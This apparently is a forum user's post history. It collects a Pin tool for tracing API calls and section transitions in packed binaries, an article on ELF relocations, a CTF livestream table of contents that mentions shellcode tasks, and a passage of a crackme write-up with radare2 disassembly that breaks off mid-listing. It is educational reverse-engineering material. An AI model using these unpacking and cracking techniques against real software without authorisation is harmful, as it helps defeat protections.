Everything posted by Nytro

  1. tiny_tracer

A Pin Tool for tracing:
- API calls
- transitions between sections of the traced module (helpful in finding the OEP of a packed module)

It generates a report in the format RVA;traced event, i.e.

345c2;section: .text
58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
3999d;called: C:\Windows\SysWOW64\KernelBase.dll.InitializeCriticalSectionEx
398ac;called: C:\Windows\SysWOW64\KernelBase.dll.FlsAlloc
3995d;called: C:\Windows\SysWOW64\KernelBase.dll.FlsSetValue
49275;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
4934b;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
...

How to build?

To compile the prepared project you need Visual Studio >= 2012. It was tested with Intel Pin 3.7 and Pin 3.10. Clone this repo into \source\tools inside your Pin root directory. Open the project in Visual Studio and build. You will find more details about installation and usage on the project's Wiki.

Source: https://github.com/hasherezade/tiny_tracer
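A report in this RVA;event format is trivial to post-process. The following is a minimal C sketch (not part of tiny_tracer; the default report file name and the idea of filtering only the "called:" lines are assumptions for illustration) that splits each line on the first semicolon and prints the called APIs together with their RVAs:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Minimal parser for a tiny_tracer-style "RVA;traced event" report.
     * Prints only the "called:" events together with their RVA. */
    int main(int argc, char **argv)
    {
        const char *path = argc > 1 ? argv[1] : "report.tag"; /* hypothetical default name */
        FILE *f = fopen(path, "r");
        if (!f) { perror("fopen"); return 1; }

        char line[1024];
        while (fgets(line, sizeof line, f)) {
            char *sep = strchr(line, ';');
            if (!sep) continue;                      /* skip lines without RVA;event */
            *sep = '\0';
            unsigned long rva = strtoul(line, NULL, 16);
            char *event = sep + 1;
            event[strcspn(event, "\r\n")] = '\0';    /* trim the newline */
            if (strncmp(event, "called: ", 8) == 0)
                printf("0x%lx -> %s\n", rva, event + 8);
        }
        fclose(f);
        return 0;
    }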
  2. ELF Binaries and Relocation Entries

29 Nov 2019

Recently I have been working on getting the OpenRISC glibc port ready for upstreaming. Part of this work has been to run the glibc testsuite and get the tests to pass. The glibc testsuite has a comprehensive set of linker and runtime relocation tests. In order to fix issues with the tests I had to learn more than I knew before about ELF Relocations, Thread Local Storage and the binutils linker implementation in BFD. There is a lot of documentation available, but it's a bit hard to follow as it assumes certain knowledge; for example, have a look at the Solaris Linker and Libraries section on relocations. In this article I will try to fill in those gaps.

This will be an illustrated 3-part series covering:
- ELF Binaries and Relocation Entries
- Thread Local Storage
- How Relocations and Thread Local Storage are implemented

All of the examples in this article can be found in my tls-examples project. Please check it out. On Linux, you can download it and make it with your favorite toolchain. By default it will cross compile using an OpenRISC toolchain. This can be overridden with the CROSS_COMPILE variable. For example, to build for your current host:

$ git clone git@github.com:stffrdhrn/tls-examples.git
$ make CROSS_COMPILE=
gcc -fpic -c -o tls-gd-dynamic.o tls-gd.c -Wall -O2 -g
gcc -fpic -c -o nontls-dynamic.o nontls.c -Wall -O2 -g
...
objdump -dr x-static.o > x-static.S
objdump -dr xy-static.o > xy-static.S

Now we can get started.

ELF Segments and Sections

Before we can talk about relocations we need to talk a bit about what makes up ELF binaries. This is a prerequisite as relocations and TLS are part of ELF binaries. There are a few basic ELF binary types:

- Objects (.o) - produced by a compiler; contain a collection of sections; also called relocatable files.
- Program - an executable program; contains sections grouped into segments.
- Shared Objects (.so) - a program library; contains sections grouped into segments.
- Core Files - a core dump of program memory; these are also ELF binaries.

Here we will discuss Object Files and Program Files.

An ELF Object

The compiler generates object files; these contain sections of binary data and are not executable. The object file produced by gcc generally contains .rela.text, .text, .data and .bss sections.

- .rela.text - a list of relocations against the .text section
- .text - contains compiled program machine code
- .data - static and non-static initialized variable values
- .bss - static and non-static non-initialized variables

An ELF Program

ELF binaries are made of sections and segments. A segment contains a group of sections, and the segment defines how the data should be loaded into memory for program execution. Each segment is mapped to program memory by the kernel when a process is created. Program files contain most of the same sections as objects, but there are some differences:

- .text - contains executable program code; there is no .rela.text section
- .got - the global offset table used to access variables, created at link time. May be populated during runtime.

Looking at ELF binaries (readelf)

The readelf tool can help inspect ELF binaries. Some examples:

Reading Sections of an Object File

Using the -S option we can read sections from an ELF file. As we can see below we have the .text, .rela.text, .bss and many other sections.
$ readelf -S tls-le-static.o There are 20 section headers, starting at offset 0x604: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 00000000 000034 000020 00 AX 0 0 4 [ 2] .rela.text RELA 00000000 0003f8 000030 0c I 17 1 4 [ 3] .data PROGBITS 00000000 000054 000000 00 WA 0 0 1 [ 4] .bss NOBITS 00000000 000054 000000 00 WA 0 0 1 [ 5] .tbss NOBITS 00000000 000054 000004 00 WAT 0 0 4 [ 6] .debug_info PROGBITS 00000000 000054 000074 00 0 0 1 [ 7] .rela.debug_info RELA 00000000 000428 000084 0c I 17 6 4 [ 8] .debug_abbrev PROGBITS 00000000 0000c8 00007c 00 0 0 1 [ 9] .debug_aranges PROGBITS 00000000 000144 000020 00 0 0 1 [10] .rela.debug_arang RELA 00000000 0004ac 000018 0c I 17 9 4 [11] .debug_line PROGBITS 00000000 000164 000087 00 0 0 1 [12] .rela.debug_line RELA 00000000 0004c4 00006c 0c I 17 11 4 [13] .debug_str PROGBITS 00000000 0001eb 00007a 01 MS 0 0 1 [14] .comment PROGBITS 00000000 000265 00002b 01 MS 0 0 1 [15] .debug_frame PROGBITS 00000000 000290 000030 00 0 0 4 [16] .rela.debug_frame RELA 00000000 000530 000030 0c I 17 15 4 [17] .symtab SYMTAB 00000000 0002c0 000110 10 18 15 4 [18] .strtab STRTAB 00000000 0003d0 000025 00 0 0 1 [19] .shstrtab STRTAB 00000000 000560 0000a1 00 0 0 1 Reading Sections of a Program File Using the -S option on a program file we can also read the sections. The file type does not matter as long as it is an ELF we can read the sections. As we can see below there is no longer a rela.text section, but we have others including the .got section. $ readelf -S tls-le-static There are 31 section headers, starting at offset 0x32e8fc: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 000020d4 0000d4 080304 00 AX 0 0 4 [ 2] __libc_freeres_fn PROGBITS 000823d8 0803d8 001118 00 AX 0 0 4 [ 3] .rodata PROGBITS 000834f0 0814f0 01544c 00 A 0 0 4 [ 4] __libc_subfreeres PROGBITS 0009893c 09693c 000024 00 A 0 0 4 [ 5] __libc_IO_vtables PROGBITS 00098960 096960 0002f4 00 A 0 0 4 [ 6] __libc_atexit PROGBITS 00098c54 096c54 000004 00 A 0 0 4 [ 7] .eh_frame PROGBITS 00098c58 096c58 0027a8 00 A 0 0 4 [ 8] .gcc_except_table PROGBITS 0009b400 099400 000089 00 A 0 0 1 [ 9] .note.ABI-tag NOTE 0009b48c 09948c 000020 00 A 0 0 4 [10] .tdata PROGBITS 0009dc28 099c28 000010 00 WAT 0 0 4 [11] .tbss NOBITS 0009dc38 099c38 000024 00 WAT 0 0 4 [12] .init_array INIT_ARRAY 0009dc38 099c38 000004 04 WA 0 0 4 [13] .fini_array FINI_ARRAY 0009dc3c 099c3c 000008 04 WA 0 0 4 [14] .data.rel.ro PROGBITS 0009dc44 099c44 0003bc 00 WA 0 0 4 [15] .data PROGBITS 0009e000 09a000 000de0 00 WA 0 0 4 [16] .got PROGBITS 0009ede0 09ade0 000064 04 WA 0 0 4 [17] .bss NOBITS 0009ee44 09ae44 000bec 00 WA 0 0 4 [18] __libc_freeres_pt NOBITS 0009fa30 09ae44 000014 00 WA 0 0 4 [19] .comment PROGBITS 00000000 09ae44 00002a 01 MS 0 0 1 [20] .debug_aranges PROGBITS 00000000 09ae6e 002300 00 0 0 1 [21] .debug_info PROGBITS 00000000 09d16e 0fd048 00 0 0 1 [22] .debug_abbrev PROGBITS 00000000 19a1b6 0270ca 00 0 0 1 [23] .debug_line PROGBITS 00000000 1c1280 0ce95c 00 0 0 1 [24] .debug_frame PROGBITS 00000000 28fbdc 0063bc 00 0 0 4 [25] .debug_str PROGBITS 00000000 295f98 011e35 01 MS 0 0 1 [26] .debug_loc PROGBITS 00000000 2a7dcd 06c437 00 0 0 1 [27] .debug_ranges PROGBITS 00000000 314204 00c900 00 0 0 1 [28] .symtab SYMTAB 00000000 320b04 0075d0 10 29 926 4 [29] .strtab STRTAB 00000000 3280d4 0066ca 00 0 0 1 [30] .shstrtab STRTAB 00000000 32e79e 00015c 00 0 0 1 Key to Flags: 
W (write), A (alloc), X (execute), M (merge), S (strings), I (info), L (link order), O (extra OS processing required), G (group), T (TLS), C (compressed), x (unknown), o (OS specific), E (exclude), p (processor specific)

Reading Segments from a Program File

Using the -l option on a program file we can read the segments. Notice how segments map from file offsets to memory offsets and alignment. The two different LOAD type segments are segregated by read-only/execute and read/write. Each section is also mapped to a segment here. As we can see, .text is in the first LOAD segment, which is executable as expected.

$ readelf -l tls-le-static

Elf file type is EXEC (Executable file)
Entry point 0x2104
There are 5 program headers, starting at offset 52

Program Headers:
  Type       Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD       0x000000 0x00002000 0x00002000 0x994ac 0x994ac R E 0x2000
  LOAD       0x099c28 0x0009dc28 0x0009dc28 0x0121c 0x01e1c RW  0x2000
  NOTE       0x09948c 0x0009b48c 0x0009b48c 0x00020 0x00020 R   0x4
  TLS        0x099c28 0x0009dc28 0x0009dc28 0x00010 0x00034 R   0x4
  GNU_RELRO  0x099c28 0x0009dc28 0x0009dc28 0x003d8 0x003d8 R   0x1

Section to Segment mapping:
  Segment Sections...
   00     .text __libc_freeres_fn .rodata __libc_subfreeres __libc_IO_vtables __libc_atexit .eh_frame .gcc_except_table .note.ABI-tag
   01     .tdata .init_array .fini_array .data.rel.ro .data .got .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss
   04     .tdata .init_array .fini_array .data.rel.ro

Reading Segments from an Object File

Using the -l option with an object file does not work, as we can see below.

$ readelf -l tls-le-static.o

There are no program headers in this file.

Relocation entries

As mentioned, an object file by itself is not executable. The main reason is that there are no program headers, as we just saw. Another reason is that the .text section still contains relocation entries (or placeholders) for the addresses of variables located in the .data and .bss sections. These placeholders will just be 0 in the machine code. So, if we tried to run the machine code in an object file we would end up with segmentation faults (SEGV).

A relocation entry is a placeholder that is added by the compiler or linker when producing ELF binaries. The relocation entries are to be filled in with addresses pointing to data. Relocation entries can be made in code such as the .text section or in data sections like the .got section. For example:

Resolving Relocations

The diagram above shows relocation entries as white circles. Relocation entries may be filled (resolved) at link time or dynamically during execution.

- Link time relocations: placeholders are filled in when ELF object files are linked by the linker to create executables or libraries. For example, relocation entries in .text sections.
- Dynamic relocations: placeholders are filled during runtime by the dynamic linker, e.g. via the Procedure Linkage Table. For example, relocation entries added to .got and .plt sections which link to shared objects.

Note: statically built binaries do not have any dynamic relocations and are not loaded with the dynamic linker.

In general, link time relocations are used to fill in relocation entries in code, while dynamic relocations fill in relocation entries in data sections.

Listing Relocation Entries

A list of relocations in an ELF binary can be printed using readelf with the -r option.

Output of readelf -r tls-gd-dynamic.o:

Relocation section '.rela.text' at offset 0x530 contains 10 entries:
 Offset     Info    Type               Sym.Value  Sym. Name + Addend
00000000  00000f16 R_OR1K_TLS_GD_HI1  00000000   x + 0
00000008  00000f17 R_OR1K_TLS_GD_LO1  00000000   x + 0
00000020  0000100c R_OR1K_GOTPC_HI16  00000000   _GLOBAL_OFFSET_TABLE_ - 4
00000024  0000100d R_OR1K_GOTPC_LO16  00000000   _GLOBAL_OFFSET_TABLE_ + 0
0000002c  00000d0f R_OR1K_PLT26       00000000   __tls_get_addr + 0
...

The relocation entry list explains how and where to apply the relocation entry. It contains:

- Offset - the location in the binary that needs to be updated
- Info - the encoded value containing the Type, Sym and Addend, which is broken down into:
  - Type - the type of relocation (the formula for what is to be performed is defined in the linker)
  - Sym. Value - the address value (if known) of the symbol
  - Sym. Name - the name of the symbol (variable name) that this relocation needs to find during link time
  - Addend - a value that needs to be added to the derived symbol address. This is used with arrays (i.e. for a relocation referencing a[14] we would have Sym. Name a and an Addend of the data size of a times 14)

Example File: nontls.c

In the example below we have a simple variable and a function to access its address.

static int x;

int* get_x_addr() {
  return &x;
}

Let's see what happens when we compile this source. The steps to compile and link can be found in the tls-examples project hosting the source examples.

Before Linking

The diagram above shows relocations in the resulting object file as white circles. In the actual output below we can see that access to the variable x is referenced by a literal 0 in each instruction. These are highlighted with square brackets [] below for clarity. These empty parts of the .text section are relocation entries.

Addr.  Machine Code    Assembly              Relocations
0000000c <get_x_addr>:
   c:  19 60 [00 00]   l.movhi r11,[0]       # c  R_OR1K_AHI16 .bss
  10:  44 00 48 00     l.jr r9
  14:  9d 6b [00 00]   l.addi r11,r11,[0]    # 14 R_OR1K_LO_16_IN_INSN .bss

The function get_x_addr will return the address of variable x. We can look at the assembly instructions to understand how this is done. Some background on the OpenRISC ABI:

- Registers are 32-bit.
- Function return values are placed in register r11.
- To return from a function we jump to the address in the link register r9.
- OpenRISC has a branch delay slot, meaning the instruction after a branch is executed before the branch is taken.

Now, let's break down the assembly:

- l.movhi - move the value [0] into the high bits of register r11, clearing the lower bits.
- l.addi - add the value in register r11 to the value [0] and store the result in r11.
- l.jr - jump to the address in r9.

This constructs a 32-bit value out of 2 16-bit values.

After Linking

The diagram above shows the relocations have been replaced with actual values. As we can see from the linker output, the places in the machine code that had relocation placeholders are now replaced with values. For example, 19 60 00 00 has become 19 60 00 0a.

00002298 <get_x_addr>:
    2298:  19 60 00 0a   l.movhi r11,0xa
    229c:  44 00 48 00   l.jr r9
    22a0:  9d 6b ee 60   l.addi r11,r11,-4512

If we calculate (0xa << 16) + -4512 we get 0009ee60. That is the location of x within our binary, which we can check with readelf -s, which lists all symbols.

$ readelf -s nontls-static | grep ' x'
   42: 0009ee60     4 OBJECT  LOCAL  DEFAULT   17 x

Types of Relocations

As we saw above, a simple program resulted in 2 different relocation entries just to compose the address of 1 variable. We saw:

- R_OR1K_AHI16
- R_OR1K_LO_16_IN_INSN

The need for different relocation types comes from the different requirements of each relocation.
Processing a relocation usually involves a very simple transform; each relocation type defines a different transform. The components of the relocation definition are:

- Input - the input of a relocation formula is always the Symbol Address, whose absolute value is unknown at compile time. There may also be other input variables to the formula, including:
  - Program Counter - the absolute address of the machine code location being updated
  - Addend - the addend available from the relocation entry discussed above
- Formula - how the input is manipulated to derive the output value, for example "shift right 16 bits".
- Bit-Field - specifies which bits at the output address need to be updated.

To be more specific about the above relocations we have:

Relocation Type        Bit-Field  Formula
R_OR1K_AHI16           simm16     S >> 16
R_OR1K_LO_16_IN_INSN   simm16     S & 0xffff

The Bit-Field described above is simm16, which means: update the lower 16 bits of the 32-bit value at the output offset and do not disturb the upper 16 bits.

+----------------+----------------+
|                |     simm16     |
| 31          16 | 15           0 |
+----------------+----------------+

There are many other Relocation Types with different Bit-Fields and Formulas. These use different methods based on what each instruction does and where each instruction encodes its immediate value. For full listings refer to the architecture manuals:

- Linkers and Libraries - Oracle's documentation on Intel and Sparc relocations
- Binutils OpenRISC Relocs - Binutils manual containing details on OpenRISC relocations
- ELF for ARM [pdf] - ARM Relocation Types table on page 25

Take a look and see if you can understand how to read these now.

Summary

In this article we have discussed what ELF binaries are and how they can be read. We have talked about how, from compilation to linking to runtime, relocation entries are used to communicate which parts of a program remain to be resolved. We then discussed how relocation types provide a formula and bit-mask for updating the places in ELF binaries that need to be filled in. In the next article we will discuss how Thread Local Storage works; both link-time and runtime relocation entries play a big part in how TLS works.

Further Reading

- Bottums Up - Dynamic Linker - details on the Dynamic Linker, Relocations and Position Independent Code
- GOT and PLT Key to Code Sharing - good overview of the .got and .plt sections

Source: http://stffrdhrn.github.io/hardware/embedded/openrisc/2019/11/29/relocs.html
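As a concrete illustration of the article above, the sketch below applies the two OpenRISC relocations from the example to the placeholder instruction words by hand. It is only an illustration of the S >> 16 and S & 0xffff formulas, not the actual BFD implementation; note that the high half is computed with the usual +0x8000 rounding so that the sign-extended low half reconstructs S, which is how the linked output ends up as the pair 0xa / -4512 for S = 0x9ee60.

    #include <stdint.h>
    #include <stdio.h>

    /* Patch the low 16 bits (the simm16 bit-field) of a 32-bit instruction word. */
    static uint32_t patch_simm16(uint32_t insn, uint16_t value)
    {
        return (insn & 0xffff0000u) | value;
    }

    int main(void)
    {
        uint32_t S = 0x0009ee60;              /* resolved address of x */

        uint32_t movhi = 0x19600000;          /* l.movhi r11,[0]      (placeholder) */
        uint32_t addi  = 0x9d6b0000;          /* l.addi  r11,r11,[0]  (placeholder) */

        /* R_OR1K_AHI16-style high half: S >> 16, rounded so that adding the
         * sign-extended low half gives back S.  (0x9ee60 + 0x8000) >> 16 = 0xa */
        movhi = patch_simm16(movhi, (uint16_t)((S + 0x8000) >> 16));

        /* R_OR1K_LO_16_IN_INSN-style low half: S & 0xffff = 0xee60 (-4512 signed) */
        addi = patch_simm16(addi, (uint16_t)(S & 0xffff));

        printf("l.movhi word: %08x\n", movhi); /* 1960000a */
        printf("l.addi  word: %08x\n", addi);  /* 9d6bee60 */
        return 0;
    }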
  3. GynvaelEN Part 1: https://www.youtube.com/watch?v=pYrGJ... Table of Content: 00:08 [PROLOG] nervous_testpilot - Focus | http://nervoustestpilot.co.uk/ 02:15 [PROLOG] TheFatRat - Monody (feat. Laura Brehm) | https://youtube.com/user/ThisIsTheFatRat 07:06 [PROLOG] Stellardrone - Bettween The Rings 13:20 ⁂ START ⁂ - Greetings ( ;E ) 13:45 Short agenda about todays' stream; Q&A rules 14:50 Announcements and hypes - introduction of mod's page - foxtrot_charlie | https://foxtrotlabs.cc/ - Paged Out! #2 is out // Call For Papers (one page) until 02/20/2020 (20 Feb 2020); - 16:21 Authors of articles from 1st rel of Paged Out! who have chosen non-TIP/POOL SAA should receive an email; if not get back to me - I've made one of Winja CTF '18 tasks and now it's released | https://github.com/google/google-ctf/... - It looks like Dec 2018 will be exciting contest between TOP 4 of CTF Time | ctftime.org 19:24 Let's get started! 20:44 2Warm / general / 50pts 22:42 picobrowser / web exp / 200pts - on page we see that we are not picobrowser so we are going to change User-Agent - see Dev Tools in web browser, but could be solved in different way, e.g. curl 26:39 Question: Can we use CTFs for prepare for OSCP? Q @ YT chat: are CTFs useful for real life pentesting? 29:03 plumbing / general / 200pts - netcat + "grep to win" technique which is easy and was described previously 30:11 rsa-pop-quiz / crypto / 200pts - tools: netcat + Python CLI as helper for calculations - knowledge: basics of prime numbers and RSA theory - objectives of this task: get to know with RSA - it's really simple 51:31 slippery-shellcode / bin exp / 200pts - tools: checksec.sh (checking protection of running binary) - knowledge: basics of assembly and code review of C-like languages - objectives of this task: old-school basic exploitation with a NOP sled; 32-bit ELF binary (execute shellcode, get the rid of problem with buffering, have no protections, isn't PIE...) + 0:57:44 about shellcodes + 1:00:00 writing a shellcode that uses fopen/fgets found in memory at known locations 1:10:42 Q: Do you know what AVX2 is used for in assembly? - some historical roots of SIMD extensions in Intel CPUs (MMX, SSE, AVX), why was it created, and registers naming (mm0, xmm0, ymm0, zmm0) - note from viewer: there is JSON parser library that uses vectorized instructions 1:15:16 Q: Check whether it is statically linked on the server also, not just the downloaded version. - why this should *not* be true for CTFs because of annoying players and what's the difference from not-lab exploitation cases 1:16:40 vault-door-3 / rev eng / 200pts - reversing Java code 1:27:28 "I'm going to show you another way to do this" - taking a fresh look at the same problem since I got confused by trying to do the reverse mapping in my head on livestream (which I failed hard); so instead, I showed a way to get the mapping to generate itself 1:32:29 Q: What motivates you when doing a hard challenge? 1:34:10 whats-the-difference / general / 200pts - comparing two binary files with use of python Q: What about zip() in Python when the length of lists is not equal? Q: How hard does a challenge have to be to resemble that of a real life scenario in the work force (or as close as it come)? 1:39:58 where-is-the-file / general / 200pts - file starting with . 1:41:20 WhitePages / forensics / 250pts - three code units: E2 80 83 ... - funky ASCII art or binary ASCII encoding? 
- at the end: a note about ASCII and code pages 1:51:03 c0rrupt / forensics / 250pts 1:51:43 In YT chat Daniel mentioned 24/7 CTF challenges (https://247ctf.com/). Take a look at it - they are really cool! Returning to task: - broken PNG file... - ...but many files are simply based on zlib aka DEFLATE (e.g. ZIP, GZIP, HTTP compression, but also PNG) - we will try to brute force it! - ...and in the end hack it in GIMP. 2:01:55 Q: With zlib compression, can we decompress even without the beginning of the bytes stream? Or if we have "holes" in the bytes stream? 2:03:55 m00nwalk / forensics / 250pts - WAV file with 11MB Please make volume down, because we are m00nwalking with SSTV over the stream sound directly 😎 - from 2:07:00 to 2:07:56 - from 2:09:57 to 2:10:03 - from 2:10:53 to 2:11:33 2:18:17 Q: What did you study in college/University and what certs did you get? See also (in Polish but Google Translate could do the thing): - https://gynvael.coldwind.pl/?id=337 - https://gynvael.coldwind.pl/?id=338 2:20:36 Epilog Thanks for attending folks! Thank you foxtrot_charlie for being my Moderator today! Next stream is planned on next Wednesday (part 3). 2:21:06 [EPILOG] nervous_testpilot - Our Heroes | http://nervoustestpilot.co.uk (kudos to J.V. for ToC!) Our Discord: https://discord.gg/QAwfE5R Our IRC: #gynvaelstream-en on freenode
  4. Practical case: Crack Me 0x03

In this article, a crack-me challenge that was present in the Hackfest2019 classic CTF will be solved. The challenge has been created by myself. Firstly, information about the challenge will be given, after which it will be solved in multiple ways. Lastly, the challenge's complete source code and design process will be discussed. One can download the challenge here.

In total, 52 teams participated in the classic Hackfest2019 CTF. Out of these, there were 18 teams that solved the challenge.

Observations regarding the challenge

The theme of Hackfest2019 was upside down, although the CTF itself was not bound to this theme. When opening the challenge page, one was greeted with the message that is given below.

BRIEFING STATEMENT 02489184
This is a call for aid to any reverse engineer that is skilled enough to solve this riddle. Everybody here solved this ridiculously easy challenge, obviously. Duh! If you think you're worthy, then see for yourself. Oh, and uh, please do submit the answer in this online platform so we can, uh, verify it!
END OF BRIEFING

Aside from being both a taunt and a joke, the message contains a hint: the answer to the question is the flag for this challenge. As there is no flag format for this CTF, this hint provides valuable information.

When using the GNU/Linux file utility, one will see that the challenge consists of a stripped x86_64 ELF binary:

ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=db660f9010ec370828ed57e15cbc7d25cbf4c479, stripped

Upon executing the binary, it prints a riddle. After that, user input is requested.

If up is down, then where are you now?
I am:

The program takes a few seconds before providing an answer, as can be seen below.

I am: asdf
Not all those who wander are lost, although it seems you are!

Upon entering a long string, the program crashes. This means that there is little to no sanitisation of the provided input.

If up is down, then where are you now?
I am: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Not all those who wander are lost, although it seems you are!
*** stack smashing detected ***: terminated
Aborted (core dumped)

Since this is not a binary exploitation challenge, there is not too much that can be gained from experimenting with the length of the input. Lastly, the strings utility can potentially provide valuable insight into the binary itself. The output is given below.

/lib64/ld-linux-x86-64.so.2 libc.so.6 strcpy srand __isoc99_scanf puts time __stack_chk_fail printf sleep __cxa_finalize strcmp __libc_start_main GLIBC_2.7 GLIBC_2.4 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable AWAVI AUATL []A\A]A^A_
If up is down, then where are you now? I am: It seems to me, that you are home! Not all those who wander are lost, although it seems you are! ;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
.shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .data .bss .comment

The strings that are shown above are the result of using strings. Noteworthy is the string that is shown when the user is home. This likely is the message one gets when the correct input is given. It is highlighted below.

It seems to me, that you are home!
Multiple approaches There are multiple approaches to solve such a challenge. In this article, the challenge will be solved dynamically using Radare2, via tracing with ltrace, and statically with Ghidra. Additionally, the creation of the challenge will be discussed, together with the source code. Note that each method only uses information from the observations above. This provides insight in the multiple ways that can be used to solve this challenge. Dynamic analysis – debugging The debugging of this binary will be done using Radare2. In this article, the version of Radare2 is radare2 4.1.0-git 23803 @ linux-x86-64 git.4.0.0-42-ged0873e2f. To debug a binary, use the -d flag, together with a path to the binary, as can be seen below. r2 -d ./whereAmI.elf Radare2 will then provide information about the process ID, the binary’s address, and the bitness of the sample. The output is given below. Process with PID 17757 started... = attach 17757 17757 bin.baddr 0x555ef9f54000 Using 0x555ef9f54000 asm.bits 64 One can then instruct Radare2 to analyse the loaded binary using aaa. After the analysis is complete, one can get an overview of all functions using afl (All Functions List), as can be seen below. 0x555ef9f547c0 1 42 entry00x555efa155fe0 1 4124 reloc.__libc_start_main 0x555ef9f54720 1 6 sym.imp.strcpy 0x555ef9f54730 1 6 sym.imp.puts 0x555ef9f54740 1 6 sym.imp.__stack_chk_fail 0x555ef9f54750 1 6 sym.imp.printf 0x555ef9f54000 2 25 map.home_libra_Downloads_whereAmI.elf.r_x 0x555ef9f54760 1 6 sym.imp.srand 0x555ef9f54770 1 6 sym.imp.strcmp 0x555ef9f54780 1 6 sym.imp.time 0x555ef9f54790 1 6 sym.imp.__isoc99_scanf 0x555ef9f547a0 1 6 sym.imp.sleep 0x555ef9f548c0 5 154 -> 67 entry.init0 0x555ef9f54880 5 58 -> 51 entry.fini0 0x555ef9f547b0 1 6 fcn.555ef9f547b0 0x555ef9f547f0 4 50 -> 40 fcn.555ef9f547f0 0x555ef9f548ca 15 1874 main Based on the size and purpose of the main function, this function is the first to check out. Using s main, one can seek towards the main function. Using pdf (Print Disassembly Function), one can get the complete disassembly of the function. The disassembled instructions are given below. Afterwards, the assembly instructions are analysed in smaller parts. 0x555ef9f548ca push rbp 0x555ef9f548cb mov rbp, rsp 0x555ef9f548ce sub rsp, 0x820 0x555ef9f548d5 mov dword [var_814h], edi ; argc 0x555ef9f548db mov qword [var_820h], rsi ; argv 0x555ef9f548e2 mov rax, qword fs:[0x28] 0x555ef9f548eb mov qword [var_8h], rax 0x555ef9f548ef xor eax, eax 0x555ef9f548f1 lea rdi, str.If_up_is_down__then_where_are_you_now ; 0x555ef9f550a8 ; "If up is down, then where are you now?" 
0x555ef9f548f8 call sym.imp.puts ; int puts(const char *s) 0x555ef9f548fd lea rdi, str.I_am: ; 0x555ef9f550cf ; "I am: " 0x555ef9f54904 mov eax, 0 0x555ef9f54909 call sym.imp.printf ; int printf(const char *format) 0x555ef9f5490e lea rax, [var_20h] 0x555ef9f54912 mov rsi, rax 0x555ef9f54915 lea rdi, [0x555ef9f550d6] ; "%s" 0x555ef9f5491c mov eax, 0 0x555ef9f54921 call sym.imp.__isoc99_scanf ; int scanf(const char *format) 0x555ef9f54926 mov edi, 3 0x555ef9f5492b call sym.imp.sleep ; int sleep(int s) ;omitted variable initialisations 0x555ef9f54ea1 mov qword [var_4d8h], rax 0x555ef9f54ea8 mov dword [var_800h], 4 0x555ef9f54eb2 mov dword [var_7fch], 0x12c ; 300 0x555ef9f54ebc mov edi, 0 0x555ef9f54ec1 call sym.imp.time ; time_t time(time_t *timer) 0x555ef9f54ec6 mov edi, eax 0x555ef9f54ec8 call sym.imp.srand ; void srand(int seed) 0x555ef9f54ecd mov dword [var_804h], 0 0x555ef9f54ed7 mov dword [var_7f8h], 0x29 ; ')' ; 41 0x555ef9f54ee1 mov dword [var_7f4h], 3 0x555ef9f54eeb mov byte [var_9h], 0xa 0x555ef9f54eef mov dword [var_804h], 0 ┌─< 0x555ef9f54ef9 jmp 0x555ef9f54f24 ┌──> 0x555ef9f54efb mov eax, dword [var_804h] ╎│ 0x555ef9f54f01 movsxd rdx, eax ╎│ 0x555ef9f54f04 mov rax, qword [var_788h] ╎│ 0x555ef9f54f0b add rax, rdx ╎│ 0x555ef9f54f0e movzx edx, byte [rax] ╎│ 0x555ef9f54f11 mov eax, dword [var_804h] ╎│ 0x555ef9f54f17 cdqe ╎│ 0x555ef9f54f19 mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f1d add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54ef9 ╎└─> 0x555ef9f54f24 mov eax, dword [var_804h] ╎ 0x555ef9f54f2a cmp eax, dword [var_7f4h] └──< 0x555ef9f54f30 jl 0x555ef9f54efb 0x555ef9f54f32 lea rax, [var_14h] 0x555ef9f54f36 add rax, 3 0x555ef9f54f3a mov rdx, qword [var_4e0h] 0x555ef9f54f41 mov rsi, rdx 0x555ef9f54f44 mov rdi, rax 0x555ef9f54f47 call sym.imp.strcpy ; char *strcpy(char *dest, const char *src) 0x555ef9f54f4c mov dword [var_804h], 0 ┌─< 0x555ef9f54f56 jmp 0x555ef9f54f85 ┌──> 0x555ef9f54f58 mov eax, dword [var_804h] ╎│ 0x555ef9f54f5e movsxd rdx, eax ╎│ 0x555ef9f54f61 mov rax, qword [var_670h] ╎│ 0x555ef9f54f68 add rax, rdx ╎│ 0x555ef9f54f6b mov edx, dword [var_804h] ╎│ 0x555ef9f54f71 lea ecx, [rdx + 6] ╎│ 0x555ef9f54f74 movzx edx, byte [rax] ╎│ 0x555ef9f54f77 movsxd rax, ecx ╎│ 0x555ef9f54f7a mov byte [rbp + rax - 0x14], dl ╎│ 0x555ef9f54f7e add dword [var_804h], 1 ╎│ ; CODE XREF from main @ 0x555ef9f54f56 ╎└─> 0x555ef9f54f85 cmp dword [var_804h], 2 └──< 0x555ef9f54f8c jle 0x555ef9f54f58 0x555ef9f54f8e mov dword [var_804h], 0 ┌─< 0x555ef9f54f98 jmp 0x555ef9f54fc7 ┌──> 0x555ef9f54f9a mov eax, dword 